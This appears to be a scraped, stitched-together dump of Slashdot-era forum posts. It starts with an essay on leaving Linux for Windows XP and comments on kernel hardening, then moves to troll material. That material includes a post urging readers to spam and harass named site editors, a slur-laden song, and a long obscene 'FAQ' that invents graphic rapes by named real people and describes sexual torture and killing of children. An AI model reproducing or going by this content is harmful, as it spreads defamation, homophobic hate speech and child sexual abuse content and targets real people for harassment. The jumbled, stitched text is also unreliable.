While having access to the latest version of the kernel is a good thing for developers, for home users it can be a nightmare. Got RedHat Linux 7.3? Perhaps you run SuSE 7.3 or Debian 2.2. You'll have to download a binary package specific to your distro. (I'm assuming that home users won't change their default kernel, but if they did, that binary package wouldn't even work!) Hardware manufacturers should be able to provide one single driver that works on all minor versions of a major kernel release. This way it would work will all current distros, instead of having to provide multiple binaries or source code. Hardware manufacturers don't want to give out the source, as this often gives away trade secrets about how their hardware is designed.
The solution seems to be to make binary drivers work on a variety of kernel versions. I'm not sure if this is even possible with the way the kernel is designed (I'm no kernel hacker), but it would go a long way toward making Linux more accessible to the home user. Even if the kernel needs to be redesigned to support this, then in my opinion, it should be done. Linux users are always clamouring for drivers... perhaps if the kernel had something like this, it might one day become a reality.
Hardware setup
While SuSE Linux 8.0 gave me some good experiences with hardware detection (such as automatic download of NVIDIA drivers), it also let me down as in this area.
The good: I recently borrowed a digital camera from a mate at work, to take photos of my case mod. Imagine how happy I was when I plugged it into my nearest USB port, and it was automatically configured (as a SCSI device) and mounted! SuSE even added it to my
The bad: Along came my new IDE CDRW drive. At AU$99, I couldn't pass up the purchase. Plugging it in gave me no joy. I was very disappointed that a device so common couldn't be detected and automatically configured under a modern operating system. The instructions on the SuSE support site said to add lines to lilo.conf and reboot. While this is a perfectly acceptable way to get hardware working for a geek familiar with *NIX, I believe that a home user shouldn't have to do more than plug it in. It's an IDE device, it's not that complicated!
The ugly: Once the hardware was finally working (as a pseudo-scsi drive), the next hurdle was to find decent graphical tools to burn and copy CDs. I finally settled on CDBakeOven, an above average KDE application. It burned CDs from data on the hard drive, but for some reason cdrecord (the command line backend) refused to allow me to copy a cd directly. Yes, it was installed SUID root. CD copying is such a basic function nowadays, why is it so hard to do under GNU/Linux?
Software distribution
I'll put this simply. I'm a home user, not a programmer. Why on earth should I have to compile the software I want to use? I know that having the source available is a good thing, but I'll say it again: I'm no programmer. I just want to install software and run it.
This leads to another point. Although having package databases (such as the rpm and deb systems use) is great, there should definitely be seperation between system packages and additionally installed software. There needs to be a standard installer and database for user-installed applications such as word processors, email clients and games, and it should be seperate from the rpm or deb databases used for system software such as lilo, init and cron. This will make it much easier for home users to know what applications they have installed on their PC, and to easily uninstall them if necessary, without knowing some arcane commands and weird package names.
Support
There is a huge wealth of knowledge among the thousands (millions?) of people that run GNU/Linux around the world. If you have a problem, odds are that someone out there can help you, often for free. This is one of the linux platform's greatest strengths. However, Linux users are also its greatest weakness. This may not apply to most of the community, but there is a very vocal minority that gives Linux a bad name. To every Linux user that has ever helped a newbie, I thank you. I have been helped by many a guru, often when I've been asking the simplest of questions. It's the remainder that are a problem.
I once heard a song by Three Dead Trolls in a Baggie called Every OS Sucks, where Linux users were described as 'elitist nerdy shmucks'. Sadly this is true for much of the 'community'. Too many consider themselves better than the rest of the world because they run Linux. Can you believe that? It's just a computer operating system, but somehow they think that it makes them better than those people who run systems such as Microsoft Windows! Elitism drives people away, as does saying âoeRTFMâ or belittling people who choose a different distro from yourself.
'Nuff said about that.
So what now?
Well, I decided to go back to a Microsoft platform. Initially being paranoid after reading things about DRM and spyware, I bit the bullet and installed Microsoft Windows XP. Like every OS, it has good and bad points; most of which you can learn about from online reviewers. I'll just point out several things that make me want to keep using it instead of GNU/Linux.
Fast graphical subsystem: Windows has lighting quick graphics, both 2d and 3d. There's no denying it. When I move a window, it refreshes so fast that I don't miss X11 at all. While not quite as nice as some other operating systems, font support is outstanding compared to XFree86.
Drivers: Point and click to install (as a superuser, of course). Windows warns you if the driver isn't likely to work properly, and can roll back to working drivers if you deliberately choose to install one that hoses your system.
Hardware setup: My CDRW worked right away, without a hitch. I am able to drag and drop files from the Explorer file manager to the CDRW icon and they get added to the list of things to burn. A quick install of Nero Burning Rom, and I was able to make a backup copy of my game CDs. (I don't like taking originals to LANs where they can get destroyed or stolen).
Software distribution: All windows software comes in binaries, either with an installer or in a zip file. I hope to never compile an application ever again. Software designed for a different version of windows is 99% guaranteed to run, but if not, there is always 'compatibility mode'. One thing to note, however: Applications designed for single user versions of windows usually only run properly as a superuser, and this includes 3d games. I expect this to be rectified as the rest of the Windows world catches up to a multi-user environment.
I can't comment on the Windows using community yet. I've not yet had a problem that a simple point and click couldn't fix. However, I will say that my original concern with Windows '95 has been addressed in Windows XP. The stability is finally there.
Final Notes
In conclusion, I'd just like to make it known that I haven't completely abandoned the Linux community. My home server still runs Mandrake, and IPCop on my gateway/firewall. There is no way I'd ever put any form of Windows on my server, nor would I ever connect a Windows PC directly to the internet without a *NIX gateway in between. Microsoft has a history of poor security, so I protect myself the only way I know how; using Linux. I will continue to advocate the use of GNU/Linux in the server arena. This is where its strength lies at the moment.
Because of their history of spreading virii, I don't use the applications that Microsoft has provided with Windows XP. My wife and I use Mozilla for web browsing and email, OpenOffice.org for word processing, and Psi (Jabber client) for instant messaging. All of these are true multi-user win32 programs, and are perfectly interoperable with their Linux counterparts.
I expect that the Linux community will have something to say about this article; I welcome comments and constructive criticism. Flames will be automatically sent to the Windows equivalent of
By Tony âoekNIGitsâ Collins
- posted by poopbot: information likes to be narrow
jLw2w4QNd6 Post #763
Feature gaps like a fox!
ACLs (access control lists) are a wonderful technology, but for non-trivial systems they become an administrative pain in the @ss. In principle you would set them up and forget about them, or at least let users maintain their own, but in practice users can't maintain their own, and they will pester you to death with requests for changes.
They also tend to drag the sysadmin into office politics. E.g., Secretary A is out on vacation and Secretary B calls you and says Secretary A did not set up her ACLs correctly and would you please give B access to certain of A's files. In addition to the annoyance of having to babysit the users, there's really no correct response to such a request.
ACLs would be great on a system where everyone is a power user. In practice that usually means your home system where you are the only user, so ACLs aren't very helpful anyway.
Conclusion: wonderful technology, hope I never see it again.
BTW, I speak from personal experience, having formerly managed VAXen with their wonderful ACL implementation. I don't object to ACLs on Linux, I just don't want them.
Sheesh, evil *and* a jerk. -- Jade
You probably wanted to be flamed, at least I hope to God for your sake you did this to intentionally draw flames, but I'm not going to flame.
Instead, I'm just going to state clearly and concisely: Look at the huge amounts of problems the security holes in Winblows has caused, and look at the problems the security holes in Linux has caused.
The proof is in the pudding, the actual track record of each OS, everything else is hypothetical bullshit.
Either your network or ip address has been banned from this site
due to script flooding that originated from your network or ip address -- or this IP might have been used to post comments designed to break web browser rendering. If you feel that this is unwarranted, feel free to include your IP address (1.2.3.4) in the subject of an email, and we will examine why there is a ban. If you fail to include the IP address (again, in the Subject!), then your message will be deleted and ignored. I mean come on, we're good, we're not psychic.
Since you can't read the FAQ because you're banned, here's the relevant portion:
Why is my IP banned?
 Perhaps you are running some sort of program that loaded thousands of Slashdot Pages. We have limited resources here and are fairly protective of them. We need to make sure that everyone shares. If your IP loads thousands of pages in a day, you will likely be banned. Please note that many proxy servers load large quantities of pages, but we can usually distinguish between proxy servers being used by humans, and IPs running software that is hammering our servers.
 Your IP might have been used to perform some sort of denial of service attack against Slashdot. These range from simple programs that just load a lot of pages, to programs that attempt to coordinate an avalanche of posts in the forums (often through misconfigured "Open Relay" proxy servers).
 You might be using a proxy server that is also being used by another person who did something from the above list. You should have your proxy server administrator contact us.
 Your IP might have been used to post comments designed to break web browser rendering.
Answered by: CmdrTaco
Last Modified: 7/02/02
How do I get an IP Unbanned?
Email banned@slashdot.org. Make sure to include the IP in question, and any other pertinent information. If you are connecting through a proxy server, you might need to have your proxy server's admin contact us instead of you.
Answered by: CmdrTaco
Last Modified: 3/26/02
- posted by poopbot: lovely snot! wonderful snot!
rLV4eIWI1u Post #764
- Do not connect the Linux box to the Internet.
- Remove your floppy drive.
- Remove the power switch.
- Lock the computer away in a safe.
Of course this has the disadvantage that you cannot use your computer anymore. But that's the price you have to pay for security...This way you'll be safe from DoS attacks, as well as other attacks from the net.
Before the days of the net, floppies were the main way to spread virusses.
All measures above only protect from the danger of remote people. But by removing the power button (and therefore the possibility to turn the computer on), even people who get physically to the computer can't do anything evil with it.
All of the above measures could be circumvented with a simple screwdriver and other normal equipment. But by putting it into a good safe, you're safe from the average intruder.
The Tao of math: The numbers you can count are not the real numbers.
This is such an obvious troll. What a shame it got modded up. Just a few of the more glaring errors:
C, a language that provides no security features such as garbage collection
In what sense is garbage collection a security feature? That makes no sense.
It is a very sad fact, but logically Microsoft's programmers are smarter than those in open source, simply because they're able to earn more money
That's not true at all. As someone who makes their living programming I can tell you that there are plenty of dumb commercial programmers and plenty of smart open source programmers. And vice versa. If you really wanted to be "logical" you'll understand that money earnt is not the same as skill. Plenty of people do highly skilled work without payment - ever heard of a hobby?
go for an operating system controlled by one company, who knows what their code does, and how to fix it if it goes wrong. The only option, in that case, is Microsoft.
Er... or Apple?
Like I said, blatant troll.
Sailing over the event horizon
"...It is a very sad fact, but logically Microsoft's programmers are smarter than those in open source, simply because they're able to earn more money..." Did you know that a McDonalds manager makes $26 an hour and a starting computer tech makes about $8. Who is smarter? The guy wearing the paper hat or the geek..... I'll just let you think about that one.
This is how you know you're a geek the power goes out and you are unemployed and unemployable. Yes I know I can't spell
Microsoft has taken all the hard work out with Windows 2000! There is a cool GUI you can use to point-and-click your way to a safe and secure system. Now I don't have to keep up with recompiling the kernel, all I have to do is apply the occasional service pack.
People often forget that the things that make unix multiuser are great security tools. For example, for local security, people who should be able to run certain suid programs can be put in special groups, and then the admin can chown and chmod the executables appropriately.
Running applications in a chroot'ed environment is also helpful. A bit hard to setup, but once you do it, no problems.
Use tools such as iptables to restrict access. For instance, if you know that all your connections will come from *.host.com, change the rules accordingly.
Kernel patches are ugly. They try to get at the root of the problem, but they miss it completely.
The point is that vulnerable code is written by bad coders, who for some unknown reasons think that C is the best language in the universe. Clearly, they can't handle the power that C gives them and should use languages that provide memory handling for them.
... you can try PitBull from Argus Systems. It's a very good product and free for non-commercial use (I think). If you can live without the source to their module.
Credits: dmg
Yet again the Linux so-called elite, backed up by their pseudo intellectual cohorts of the w3c conspire to ruin Linux's chances in the marketplace by sowing confusion and complexity. As someone with years of experience in the marketing world, I am constantly amazed at the willingness of the W3C and other bodies to pollute the acronym space with their content free "TLAs".
Basic marketing 101 (and an undergrad course in psychology) would tell them that the normal person is only capable of remembering approximately 7 items of data in their short-term memory, but now we have to remember HTTP, HTML, XML, XSL, DTD, PHP, SSL, DSL, ADSL, ISDN, Perl, etc etc etc
This is a text book example of the tail wagging the dog from a marketing perspective.
I have been following the standardisation of the web for many many months now, but one thing has become clear, E-commerce will NEVER become popular so long as there are so many confusing acronyms involved. The guys in charge of marketing Linux absolutely MUST work to reduce the number of acronyms. One possible solution would be to merge those protocols which are not all that different. For example, why not merge XML with SGML ? (they could call it XSGML or SXGML or perhaps XMSGML), they seem to address the same problems. Or would that be too simplistic a solution for their pampered elitist ivy-league minds to comprehend ?
If something is not done URGENTLY, and I mean URGENTLY, Linux (and other more experimental derivatives such as FreeBSD) can never hope to be taken seriously as an e-commerce platform by the people who count - the accountants.
The miracle of Linux is that anyone actually runs it at all, considering one seems to require a masters in computer science to install it! (contrast this with NT4 which was so easy to install, we let our receptionist upgrade her own machine).
As usual my "open source" advice is free. Hopefully this time my valuable advice will be taken into account the next time the w3c smell an acronym brewing.
Finally, in conclusion, as an American, I am saddened that the Internet seems to have been commandeered by a European based protocol. Was America so short of talent we had to buy the HTML protocol from Tom Berners-Lee at CERN ?
Think of the security implications of the worlds strongest economy, running an e-commerce protocol developed by a foreigner from Socialist Europe. Remember the wall has not been down for that long. Who knows what kind of trojans might be lurking within the depths of these complicated protocols.
I am afraid I am behind Al Gore on this point, how can this be necessary in the home of smart corporations such as Microsoft and Intel ? The answer is the vast subsidies given by European socialist governments to fund development of the HTML specification.
The solution is clear. The federal government should mandate and strongly subsidise the use of Microsoft software for all US corporations involved in e-commerce. Only with a US-developed set of protocols can we be assured of the security of our transactions.
- posted by poopbot: information likes to be narrow
zFpe1dUsOp Post #765
For every new protection that emerges there are people that can reverse it. Atleast if its usable. A totally safe system wont be a good tool to use since it will be locked down and hard to manage. To completely avoid remote exploits the only thing you can do is to turn all remote capabilities off or use an encryption that is too strong to break with a normal computer. The problem is that all this sucks much cpu cycles and renders the box rather slow. Use secure wan links and no connection to the internet whatsoever. As for servers go sandboxing with absolute minimal rights to memory and HD. Best would be to have completely walled off memory but current hardware or palladium doesnt allow this.
HTTP/1.1 400
the major problem today is people useing tools
to this end you can use a mac
(big endian so defeats alot of stack smashing targeted at x86)
use bsd
(THE network stack -problems in MS TCP/IP stack have been solved years ago in BSD)
and dont run any silly daemons
http://www.
does a nice job of sorting out things config wise where most problems live
regards
John Jones
so if we're adding kernel hooks that enable access controls lists, does that mean that a few years down the road, when Palladium hits, the Linux kernel will be able to easily implement a "sandboxed" ACL in order to become the ultimate in computer security / DRM madness?
Similar to the vserver idea is the concept of running another kernel of linux in 'User Mode Linux'. This allows you to run a virtual linux machine within you current install. This allows you to test kernel modules and patches in your vitrual system with out affecting the real system. This way, if your fake system gets rooted, the underlying system is ok.
If you restrict strace in grsecurity you cant seem to be able to debug your application under gdb as normal user but root can still debug. Its a good idea to not to play with strace option if you are in a software engineering environment.
Other than that it works like a charm.
Never learn by your mistakes, if you do you may never dare to try again
Version 1.1.8 (last updated 19th July 2002 by Anonymous Coward)
Note to moderators : Do not moderate this post down, if you do then you support the editors stance on censorship and you support the end of free speech and support evil organisations like Microsoft, RIAA, MPAA and laws like the CBTBA and DMCA
Sign this petition, let your voice be heard!
Slashdot is using censorship! It is trying to eridicate free and open discussion like we know slashdot to be, it has the following RESTRICTIONS in place to Censor you
They claim they don't, but they do, wonder why their are so many trolls, crapflooders and lamers on slashdot, because they are fighting for their rights! Slashdot is trying to silence the trolls. Remove the filters, the trolls get bored, and slashdot will be troll free!
- Lameness filters (It blocks a lot of legitmate posts)
- Unnessary posting delays. Hasnt taco learned to touch type? A lot of posts are typed in less than 20 seconds and it is a ANNOYING DELAY! 2 minute ban? Come on, so some are faster then others, big deal, some people have more to say than others
- Broken moderation system, The whole point is to sort the gems from the crap, yet a lot of posts designed to make a LIVELY DISCUSSION are MODERATED as flamebait! Come on, not everyone likes X, but just because some one bashes it dosent mean its Flamebait. Flame bait is more useful for DIRECT INSULTS and not legitmate discussions.
The "troll" moderation reason is fragmented and broken, why? Because they are trying to use an obsolete usenet term on a realtime discussion, "trolls" can cover a huge blanket of ideas.- Crapfloods, a meaningless flood of random letters or text, which the lameness filter does a crappy job at trying to stop, besides trolls have written tools using the opensource slashcode to generate crapfloods which bypass the filter
- Links to offensive websites, the most common one is known a http://www.goatse.cx, a awful site which shows a bleeding anus being stretched on the front page. Trolls sneak these links in by posting messages that look legitimate, but infact are sneaky redirects to the site. Common examples include rd.yahoo.com, www.linux-kernel.tk, goatsex.cjb.net, and googles "Im feeling lucky".
- Trying to break slashdot, this is actually a good thing, as it helps test slashdot for bugs. Famous examples include the goatse.cx javascript pop-up, the pagewidening post and the browser crashing post!
Subnet banning, this bans a user unless they email jamie macarthy with their mp5ed ipids. This is unfair, and banning a subnet BLOCKS A WHOLE ISP SOMETIMES, and not that individual user! This can cause chaos! But real trolls use annoymous proxys to get around this so THIS JUST BANS LEGITMATE USERS! Also, they are trying to censor some anoymous proxies, mainly from countrys like africa, so this yet more DISCRIMINATION!But, the issue that concerens us the most, is the COMMENT QUOTA. A discrimatory system that stiffles discussion, cripples the community and will ultimateley destroy slashdot unless it is removed! Annoymous cowards are allowed only 10 posts a day! This is unethical! Users with negative karma only get two! That is DISCRIMINATION! How would you like to only be able to speak once a day, just because of the color of your skin. That would be racism, and slashdot is discrimitating on people just because of a negative number in a database! BOYCOTT SLASHDOT! LET THEM DIE!
We wan't these stupid useless restrictions REMOVED! This comment will be posted again and again until it does!
Inportant imformation for users
Boycott slashdot, they are pissing over their community, they are becoming like the RIAA and MICROSOFT! Do NOT TOLERATE THIS SHIT! Here are some real news for nerds sites. We don't need slashdot, slashdot deserves to die!
MSNBC
BBC NEWS
News.com
Linux online
Linux daily news network [linuxdailynews.net]
Weird news from dailyrotten.com
Trollaxor, news for trolls, they are real people too!
CNN.com
New york times (free registration required)
LINUX.com
News forge
K5
Mandrake forum
Toms hardware
The register
Kde dot news
The linux kernel Archives
Adequecy
There are hundreds more, But this is where slashdot STEALS THE MAJORITY OF its "news" from.
Punish them, here are their emails, spam them, flame them goatse them!
Rob malda
Jamie Macarthy
ChrisD
Hemos
Micheal
Pudge
The others ones apperantly dont have an e-mail, probably because ROB MALDA IS PRETENDING HE IS JOHN KATZ.
Thank you for reading this, please feel free to repost this information, please reply to add your comments, fight slashdot and its CENSORSHIP
Don't forget to sign the petition!
- posted by poopbot: providing truth in a deceitful world
DduIOTPJGM Post #766
To the tune of "Without me", Eminem
Two penis bird guys go round the outside, round the outside, round the outside (2x)
Guess who's back [/] Back again [/] Sllort is back [/] Tell a friend
Guess who's back, guess who's back, guess who's back, guess who's back
guess who's back, guess who's back, guess who's back..
I've created a monster, cause nobody wants to read Michael no more
They want Sllort, cause Katz is a whore *duh* [/] Well if you want Sllort, this is what it'll get ya
A little bit of Troll mixed up with some professa [/] Don't mod this up they're just trying to test ya
It'll get you banned forever by the mastah [/] on the plantation, but I'm not co-operating
Been banned since 2000 for writing and creating (hey!) [/] You read it this far, now stop moderating
Cause I'm back, I'm on the keys and I'm operating [/] I know that you got a job Ms. Malda
but your husband's porn problem's complicating
So McCarthy won't let me be [/] he IP bans me, so let me see
They try to shut me down but I proxy [/] Cause it feels so empty, without me
So, clickety click, type where you sit
Fuck that, karma whorin dips, nobody gives a shit
Now get ready, cause this shit's about to get heavy
Just got a new list of proxies, FUCK YOU JAMIE!
[Chorus:]
Now this looks like a job for me [/] DOWN WITH CAPS LIKE JUNIS KANUNI
Cause we need a little, controversy [/] Cause it feels so empty to agree
I said this looks like a job for me [/] So everybody, try honesty
Cause we need a little, controversy [/] Cause it feels so empty to agree
Little Readers, posting defacement. [/] Embarrassed their parents still rent them their basement.
They get banned just like prisoners helpless [/] 'til someone posts truth in a journal and yells BULLSHIT!
A visionary, is my vision scary? [/] Could it start revolution, pollutin the stories?
A rebel, so just let me revel and gloat [/] in the fact that VA's stock price is looking like GOAT *zero!*
And it's a disaster, such a castastrophe [/] First posts are so fuckin expensive; but Katz is free?
Well I'm back, na-na-na-na-na-na-na-na-na-na [/] *bzzt* Fix your damn DSL turn it on and then I'm gonna
enter in, in the front of your skin like a virus [/] Maybe I'm unkillable, dead like Osirus
Ya I'm infecting, best thing since commenting [/] Intriuging the reader's minds and nesting
*bzzt* Testing, attention please [/] You feel the rage when Michael mentions me?
Here's my journal, you can read it free [/] A nuisance? a prophet? Ya, sounds like me.
[Chorus]
A diskette, a task set, post this cid on that sid, [/] Ask Slashdot: Are You Sofa King We Todd Did?
Jonathon Katz, smokin crack mixed with grass [/] If I ever meet you I will KICK YOUR ASS
And Taco? You can get blown by Timothy [/] You eleven year old molesting fag, join the clergy
You don't know me, you're too dumb, let go [/] It's over, nobody listens to your show
Now let's go, suicide for Signal [/] I'll be there cheering like a cheerleader on speed
Or crystal, method to the masses [/] ever since Slashbots been babblin like jackasses *bray*
Suddenly without the means [/] To bring up the MetaModeration screen?
It's not the servers re-boot-ing [/] It's just you, banned by Slashteam! *hey*
No I wasn't aiming for controversy [/] It just happened when they first banned me
Now I use it to tell others [/] That Slashteam are a bunch of fuckers!
(Hey!) Here's a concept that works [/] Twenty million other people find out you're jerks
But no matter how much you alter what they see [/] It just looks empty without me
[Chorus]
La-la-la-la, la-la-la-la-la / La-la-la-la-la, la-la-la-la
- posted by poopbot: information likes to be narrow
j2XjpeO0Td Post #767
Patching the Linux kernel (grsecurity, etc.) and implimenting ACLs is one level of security enhancement one can emply.
Userspace hardening (e.g. Bastille) is another.
Virtual servers sounds like an interesting approach as well (virtual servers running a grsecured, hardenend system anyone?)
However, as you have noted here, the 'security' of Slashdot's moderation system has been shot to hell (astroturfers of various ilks, most commonly but not exclusively Microsoft paid lackeys, and outright trolls are posting at +2 and being granted moderator priveleges on a daily basis). As to whether the above troll you reference was moderated up by trolls, Microsoft Astroturfers, or a combination is anyone's guess.
The fix is obviously for the slashdot editors to begin creating a web of trust in a similar fashion to how GPG/PGP keys are managed (complete with revokation if that trust is abused). Initially only the slashdot moderators and some well known friends of theirs would be in the ring of trust, then gradually others (based upon posting content, relationships, what have you). This would at least allow the Astroturfers and trolls to have their moderation and/or +2 posting priveleges removed when they do occasionally slip through.
In the meantime, until such an approach is taken, I'm afraid the astroturfers and trolls will continue to abuse the moderation system for the foreseeable future. Numerical benchmarks such as karma simply do not cut it when trying to filter for quality of content, discussion, moderation, and meta-moderation.
The Future of Human Evolution: Autonomy
You all talk about things like linux security, and SELinux and the patches that exist to enhance linux kernels, Then theres OpenBSD, yes reknowned for its secure by default stance. Well little known to most is a project called MicroBSD, which is actually a fork from OpenBSD, but with all the systems hardening and posix1 additions available currently! Though its young in existance, like 10 months, We have been using it on our boxes here for 6 months with no problems. I think their url is microbsd.net
But on the other hand, you know what idealism is ...
There is something almost treasonous about a linux kernel hack whose documentation's primary format is msword+ppt. Particularly when the html links are broken.
THE OFFICIAL TACO-SNOTTING FAQ [slashdot.org]
:) Join me in a WIPO-snot?
By J. Wipo Troll, Esq. [slashdot.org], $Revision: 1.16 $
[This article attempts to document a vile, ungodly practice that runs rampant through the homosexual geek and hacker community, a practice known as âoeTaco-snotting,â or simply âoesnotting.â Taco-snotting is something that few geeks dare talk about in free or open conversation, but it is nonetheless a widely-practiced and dangerous form of homosexuality. If you or anyone you know has ever engaged in Taco-snotting, please get professional help [adequacy.org] before it is too late. â"ed.]
Why do I keep receiving emails from an individual calling himself âoeCmdrTacoâ?
You have been receiving unsolicited mailings from a certain Robert âoeCmdrTacoâ Malda [cmdrtaco.net], owner of the popular technology website slashdot.org [slashdot.org]. Actually, itâ(TM)s not a very âoepopularâ site in the common sense of the word; the site is rife with pimply, antisocial geeks and hackers, zit-faced nerds, communists, dirty GNU hippies [yahoo.com], and other societal rejects and outcasts. Itâ(TM)s also home to one of the worldâ(TM)s largest suspected pædophile rings, the infamous âoeSlashdot crew.â
Whenever Mr. Malda gets bored (and who wouldnâ(TM)t, running a site like Slashdot all day), he roams through the user database, penis in hand, looking for people who might enjoy engaging in homosexual activities with him. How he determines this is anyoneâ(TM)s guess; but if you have a homosexual-sounding nickname, or a nick with a letter of the English alphabet in it, youâ(TM)re a potential candidate.
This time, he found you. Lucky you.
Mr. Malda seems to be speaking in some sort of code. Do you know what it means?
CmdrTacoâ(TM)s code language is relatively easy to decipher. This pervert prefers to speak in thinly-veiled sexual innuendo (yes, thatâ(TM)s right: he wants you) to evade the watchful eye of Slashdotâ(TM)s parent corporation, VA Software [yahoo.com]. Mr. Maldaâ(TM)s âoeCommanderâ is, of course, his penis: a small, withered little thing that lives in his pants and only comes out in the presence of other male geeks or at the beck and call of Maldaâ(TM)s own lubed-up right hand. His âoeTaco bells [sonymusic.com]â are the shriveled testicles that droop beneath his Commander, and his âoeTaco sauceâ is his thin, runny semen. It should be more than obvious to you now what he means if he asked you to âoering his Taco bellsâ or âoetaste his gourmet Taco sauce.â
I would also guess CmdrTaco asked you to engage in a practice known as âoeTaco-snottingâ and, if he was in a particularly depraved mood at the time, a âoecircle-snot.â
Good Lord. And, yes, he did. What is âoeTaco-snottingâ?
âoeTaco-snottingâ is the term used by Robert Malda to refer to the depraved act of fellating another man (homo- or heterosexual; CmdrTaco is rumoured to prefer raping unwilling victims), then blowing the semen out his nose and back onto the face and body of his victim. Naturally, a long, bubbly stream of milky-white semen is left on CmdrTacoâ(TM)s face [go.com], dribbling out of his nose and down his cheek: hence the term, âoeTaco-snotting.â
And if thatâ(TM)s not bad enoughâ¦
A âoecircle-snotâ is a Taco-snotting circle-jerk, another practice common among the Slashdot crew [bastardgenres.com]. CmdrTaco, CowboiKneel [aol.com], and Homos get together and snot each other with their gooey, sticky cum â" spooging their jizz-snot all over each otherâ(TM)s faces and pasty, white bodies, until theyâ(TM)re covered head to toe with their own and each otherâ(TM)s man juice. This vile, ungodly ritual can go on for hours. For the homosexual penetration that follows this lengthy foreplay, Roblowme is usually there to provide plenty of anal lubricant; he owns a limousine service and has ample supplies of motor oil and axle grease ready to go.
To complete this perverted orgy, fellow faggots Michael, Timothy, and Jamie will usually join in, dressed in tight leather mock-S.S. uniforms, jack boots, and leather gloves. The homosexual shenanigans that follow are nearly beyond description. The whole group begins to snot each otherâ(TM)s spunk and whip each otherâ(TM)s pudgy asses with riding crops and chains until their pale, white geek bodies are exhausted and soaked in stinking sweat from the hours of passionate, homosexual revelry.
Ewwwwww. So, can I stop receiving these emails?
Hopefully, but I wouldnâ(TM)t count on it.
To begin with, you most likely forgot to uncheck the âoeWilling to Snotâ checkbox in your account preferences. CmdrTaco has probably already got the hots for your wad (do you have a homosexual-sounding nick?), and heâ(TM)s probably already been lurking outside your bathroom window for weeks with a camera, some tissues and lube, just waiting to pounce and declare you his new bitch. Thereâ(TM)s no escaping a geek in heat (trust me), so itâ(TM)s probably too late for you, but you can possibly rectify this situation. To remove yourself from CmdrTacoâ(TM)s sights, log into your Slashdot account, go to your user page, click on Messages, and uncheck the box next to âoeWilling to Snot.â Maybe heâ(TM)ll ignore you. Probably not.
I canâ(TM)t stop receiving these emails from CmdrTaco!?
If you indulge him in a Taco-snot or two, hemight leave you alone. You might also want to look into mail filtering, restraining orders, or purchasing a heavy, blunt object capable of warding off rampaging homosexual geeks in heat. Trust me, when they charge⦠oh, the humanity. If he gets you, and you let him Taco-snot all over you, you will most likely end up tied up in his basement to be used as his sex slave for the rest of your life (or until he accidentally drowns you in spunk in a circle-snot).
Have you ever been Taco-snotted?
Unfortunately, yes. I first met Mr. Malda at an Open Source Convention [amazon.com]. He invited me back to his room for a game of Quake and some âoegourmet Tacos,â but when I got there, the perverted geek jumped me and handcuffed me to his bed, stripping me. After taking his âoeCommanderâ out of his pants, Mr. Taco made me suck the withered thing six times, virtually nonstop. He then performed his vile Taco-snotting ritual on me three times over the next two hours, bringing me to orgasm after orgasm after sweaty, mind-numbing orgasm⦠then he snotted my own thick, gooey jizz back onto my face out of his nostrils! He snotted me two more times, first into my mouth, then again on my exposed belly.
CmdrTaco invited several of his Open Source (or rather, âoeOpen Sauceâ â" man sauce) buddies over to continue their ungodly snotfest. European hacker and known überfaggot Linux Torvalds raped my ass [yahoo.com] with his âoemonolithic kernel [yahoo.com];â his partner-in-crime Anal Cox used their âoenetwork stackâ in a multitude of unspeakable ways on and in every orifice of my defenseless, tender, young body. Michael Sims was there in his leather Nazi uniform, caning my previously-virginal ass with a bamboo pole and ranting about âoeall those Censorware [spectacle.org] freaks out to get him.â
That is so disgusting! How did you finally escape?
After about 16 hours of countless unholy, homosexual atrocities perpetrated against my restrained body, they all finally went to sleep on top of me, sweat-soaked and exhausted. I was left there, completely covered in bubbly, translucent jizz-snot, chained to the bed, with half a dozen fat, pasty-white fags lying around and on top of me. Fortunately the spooge coating my flesh worked wonderfully as a lubricant â" I was able to squirm my way out of the handcuffs and slip out the back door (of the apartment, not their back doors). Iâ(TM)m just glad I survived the awful ordeal. These sexually-repressed hackers had alot of built-up spunk in their wads â" I couldâ(TM)ve easily been drowned!
Thatâ(TM)s horrible. Does âoeTaco-snottingâ have anything to do with CmdrTacoâ(TM)s âoespecial tacoâ?
No, thatâ(TM)s a different disgusting perversion CmdrTaco indulges himself in. Mr. Malda is usually not satisfied with merely snotting your own jizz back onto your face, he most often enjoys involving his own bodily fluids in his twisted games. WeatherTroll [slashdot.org] has spent some time trying to educate the Slashdot readership [slashdot.org] about this vile practice (emphasis added):
You may be wondering what CmdrTacoâ(TM)s âoespecial tacoâ is. You will be wishing that you hadnâ(TM)t been wondering after you finish reading this post. To make his âoespecial taco,â CmdrTaco takes a taco shell and shits on it. He then adds lettuce, takes out his tiny withered dick (otherwise known as his âoeCommanderâ), puts his âoespecial taco sauceâ on it which means he jacks off on the taco, and adds a compound to make the person who eats the taco unconscious. Of course, the compound does not make the person unconscious until the taco is fully eaten. Thus CmdrTaco force-feeds the taco to the unsuspecting victim. After all, who would knowingly eat shit and CmdrTacoâ(TM)s jizz?
After the victim is unconscious, he is held against his will and used for CmdrTacoâ(TM)s nefarious homosexual purposes. This includes shoving taco shells up the victimâ(TM)s ass, Taco-snotting, and getting Jon Katz involved. Trust me, you do not want Jon Katz anywhere near your unconscious body. Also, rumor has it CmdrTaco is looking for a new goatse.cx guy [goatse.cx]. Donâ(TM)t let it be you!
Different ungodly perversion, yet no less revolting. It should be clear to you now that Robert âoeCmdrTacoâ Malda is a very, very sick individual, as are most of the Slashdot editors.
Does Jon Katz get involved in any of this? I thought he was a pædophile, not a homosexual.
Actually, Jon Katz is a homosexual pædophile. Heâ(TM)s also a coprophiliac, and, many suspect, a zoophile. Mr. Katz is somewhat of a loner and doesnâ(TM)t involve himself in the circle-snots, but that doesâ(TM)t mean heâ(TM)s any less of a freak than the rest of the Slashdot crew. Katz often engages in a game called âoejuicy-douching [aol.com]â with a harem of little-boy slaves that he has collected over the years: yet another vile practice which involves administering an enema to himself of the little boyâ(TM)s urine (forced out of them with a pair of pincers), spooging the vile muck from his ass back into the enema bag, then dribbling and slathering the goo all over himself and the boyâ(TM)s chained, naked bodies. If heâ(TM)s in the mood, he will sometimes skip refilling the enema bag from his distended anus and just squirt it from his ass [microsoft.com] onto the crying, terrified boys. Unwilling boys are further tortured with the pincers until they comply and allow Mr. Katz to juicy-douche them at will. A boy will usually last about two years before Mr. Katz either accidentally drowns them in diarrhea or kills them once they get too old, usually around 13 or 14.
